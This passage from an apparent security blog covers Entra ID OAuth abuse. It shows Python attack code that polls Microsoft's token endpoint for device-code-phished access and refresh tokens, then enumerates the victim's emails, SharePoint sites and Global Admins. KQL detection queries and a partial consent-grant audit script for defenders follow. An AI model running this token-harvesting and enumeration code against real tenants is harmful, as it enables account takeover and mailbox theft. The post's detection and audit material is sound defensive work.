style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">while</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    poll_response </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://login.microsoftonline.com/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">tenant_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/oauth2/v2.0/token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        data</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 
13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"grant_type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"urn:ietf:params:oauth:grant-type:device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> device_code</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 
13%, 16%)\"><span class=\"token plain\">    result </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> poll_response</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        access_token </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        refresh_token </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"refresh_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Valid for 90 days</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"SUCCESS  persistent access obtained\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Refresh token: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">refresh_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token string-interpolation interpolation format-spec\">50]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">...\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"error\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"authorization_pending\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sleep</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Keep polling</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" 
style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Step 4: Attacker uses refresh token to enumerate and access resources</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">headers </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Bearer </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">access_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" 
style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Who am I?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">me </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 
47%);font-style:italic\"># What emails can I read?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">emails </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/messages?$top=10&amp;$select=subject,from,receivedDateTime\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 
47%);font-style:italic\"># What SharePoint sites exist?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">sites </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/sites?search=*\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Who are the Global Admins?</span><span 
class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">admins </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/directoryRoles?$filter=displayName eq 'Global Administrator'\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<p>The attacker now has a 90-day refresh token. 
They can read all emails, enumerate the entire directory, access SharePoint, and, depending on the victim's role, potentially escalate further.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"detection\">Detection<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#detection\" class=\"hash-link\" aria-label=\"Direct link to Detection\" title=\"Direct link to Detection\" translate=\"no\">​</a></h3>\n<p>Device code phishing is detectable, but only if you know what to look for. The key signal is in <code>SigninLogs</code> (the Log Analytics table that Entra ID interactive sign-ins land in) where <code>AuthenticationProtocol == \"deviceCode\"</code> for users who should never be using that protocol.</p>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Successful device code authentications from apps outside the expected set</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(1d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Status.errorCode == 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AppDisplayName !in (  // apps that legitimately use device code; see the caveat below</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Microsoft Azure PowerShell\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Microsoft Azure CLI\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Visual Studio Code\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    TimeGenerated,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UserPrincipalName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    IPAddress,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Location,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DeviceDetail,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AppDisplayName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Status</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<p>Treat the app allowlist as a convenience, not a control. The attacker picks the <code>client_id</code> when requesting the device code, and the usual picks are Microsoft's own public clients (Azure CLI, Azure PowerShell, Microsoft Office) precisely because they are pre-authorized for Microsoft Graph and excluded by lists like this one; the resulting sign-in then appears under that app's display name. The second query baselines on the user and location instead and does not depend on the app name.</p>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Device code auth from a location the user has not signed in from in 30 days</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let known_locations = </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(30d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol != \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where Status.errorCode == 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | summarize KnownLocations = make_set(Location) by UserPrincipalName;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(1d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Status.errorCode == 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| join kind=leftouter known_locations on UserPrincipalName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Location is a string and KnownLocations a dynamic array: test membership with set_has_element().</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// A plain \"Location in (KnownLocations)\" compares the string to the whole array and never matches,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// so every device code sign-in would alert. Users with no baseline at all (isnull) are kept on purpose.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where isnull(KnownLocations) or not(set_has_element(KnownLocations, Location))</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, Location, IPAddress, AppDisplayName</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-3-oauth-consent-grant-abuse--persistent-access-through-fake-applications\">Section 3: OAuth Consent Grant Abuse  
Persistent Access Through Fake Applications<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-3-oauth-consent-grant-abuse--persistent-access-through-fake-applications\" class=\"hash-link\" aria-label=\"Direct link to Section 3: OAuth Consent Grant Abuse  Persistent Access Through Fake Applications\" title=\"Direct link to Section 3: OAuth Consent Grant Abuse  Persistent Access Through Fake Applications\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-attack-that-survives-password-resets-and-mfa-changes\">The Attack That Survives Password Resets and MFA Changes<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-attack-that-survives-password-resets-and-mfa-changes\" class=\"hash-link\" aria-label=\"Direct link to The Attack That Survives Password Resets and MFA Changes\" title=\"Direct link to The Attack That Survives Password Resets and MFA Changes\" translate=\"no\">​</a></h3>\n<p>OAuth consent grant abuse is one of the most underestimated persistence mechanisms in enterprise environments. 
An attacker who tricks a user into consenting to a malicious application receives a delegated permission grant that survives password resets, MFA changes, and account recovery, along with access and refresh tokens that none of those actions reliably invalidate. The grant is recorded against the application's service principal, not against the user's credential, so changing the credential does not touch it; the access is only cut off for certain when an administrator deletes the grant (or the service principal) and revokes the user's sign-in sessions.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-oauth-consent-works-and-where-it-breaks\">How OAuth Consent Works (And Where It Breaks)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#how-oauth-consent-works-and-where-it-breaks\" class=\"hash-link\" aria-label=\"Direct link to How OAuth Consent Works (And Where It Breaks)\" title=\"Direct link to How OAuth Consent Works (And Where It Breaks)\" translate=\"no\">​</a></h3>\n<p>When a user signs into a third-party app using \"Sign in with Microsoft,\" they see a consent prompt listing the permissions the app is requesting. If they consent, Entra ID creates a service principal in the tenant representing that application (if one does not exist yet) and records the delegated permissions as an OAuth2 permission grant on it. Nothing expires that grant; it stays until someone removes it.</p>\n<p>The problem: most users click through consent prompts without reading them. 
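</p>
<p>The audit a defender runs to find where this has already happened, as an added example and not code from the original post: it walks the tenant's delegated grants (the objects <code>GET /v1.0/oauth2PermissionGrants</code> returns) joined to their service principals (<code>GET /v1.0/servicePrincipals</code>) and scores each one on the traits an illicit grant carries: consented by a single user rather than an administrator, an application owned by another tenant with no verified publisher, and <code>offline_access</code> combined with data scopes. The tenant ID, application names and grant records are constructed sample data; the two Microsoft owner tenant IDs treated as first-party are real, everything else is illustrative.</p>

```python
'''Audit delegated OAuth2 permission grants in an Entra ID tenant for the
traces an illicit consent grant leaves behind. Record shapes follow the Graph
objects returned by GET /v1.0/oauth2PermissionGrants and
GET /v1.0/servicePrincipals; every sample record below is constructed.'''
from __future__ import annotations
from dataclasses import dataclass, field

# Owner tenant IDs under which Microsoft publishes its first-party apps.
# Assumption: treat these as trusted; any other foreign owner is suspicious.
MICROSOFT_OWNER_TENANTS = {
    'f8cdef31-a31e-4b4a-93e4-5f571e91255a',  # Microsoft Services
    '72f988bf-86f1-41af-91ab-2d7cd011db47',  # Microsoft corporate tenant
}

# Delegated Graph scopes that read or alter user data at scale.
DATA_SCOPES = {
    'Mail.Read', 'Mail.ReadWrite', 'Mail.Send', 'Contacts.Read',
    'Files.Read.All', 'Files.ReadWrite.All', 'Sites.Read.All',
    'User.ReadBasic.All', 'User.Read.All', 'Directory.Read.All',
    'MailboxSettings.Read', 'MailboxSettings.ReadWrite',
}

@dataclass
class Finding:
    app: str
    grant_id: str
    principal_id: str | None
    score: int = 0
    reasons: list[str] = field(default_factory=list)

    def add(self, points: int, reason: str) -> None:
        self.score += points
        self.reasons.append(reason)

def parse_scopes(scope: str | None) -> frozenset[str]:
    '''oauth2PermissionGrant.scope is a single space-separated string.'''
    return frozenset((scope or '').split())

def assess_grant(grant: dict, sp: dict, tenant_id: str) -> Finding:
    '''Score one grant; zero means nothing about it resembles an illicit grant.'''
    f = Finding(app=sp.get('displayName', grant['clientId']),
                grant_id=grant['id'], principal_id=grant.get('principalId'))
    owner = sp.get('appOwnerOrganizationId')
    foreign = owner is not None and owner != tenant_id and owner not in MICROSOFT_OWNER_TENANTS
    if foreign:
        f.add(3, 'application owned by foreign tenant ' + owner)
        if not (sp.get('verifiedPublisher') or {}).get('displayName'):
            f.add(1, 'publisher not verified')
    if grant.get('consentType') == 'Principal':
        f.add(1, 'consented by a single user, not an administrator')
    scopes = parse_scopes(grant.get('scope'))
    data = sorted(scopes.intersection(DATA_SCOPES))
    if data:
        f.add(len(data), 'data scopes: ' + ', '.join(data))
        if 'offline_access' in scopes:
            f.add(3, 'offline_access: a refresh token keeps the access alive')
    if 'MailboxSettings.ReadWrite' in scopes:
        f.add(2, 'can create inbox forwarding rules')
    return f

def audit(grants: list[dict], service_principals: list[dict], tenant_id: str) -> list[Finding]:
    '''Join grants to their service principal (clientId is the SP object id) and rank them.'''
    by_id = {sp['id']: sp for sp in service_principals}
    findings = [assess_grant(g, by_id.get(g['clientId'], {}), tenant_id) for g in grants]
    return sorted((f for f in findings if f.score), key=lambda f: f.score, reverse=True)

# Constructed sample data: one first-party app, one tenant-owned app, one illicit grant.
TENANT_ID = '11111111-1111-1111-1111-111111111111'
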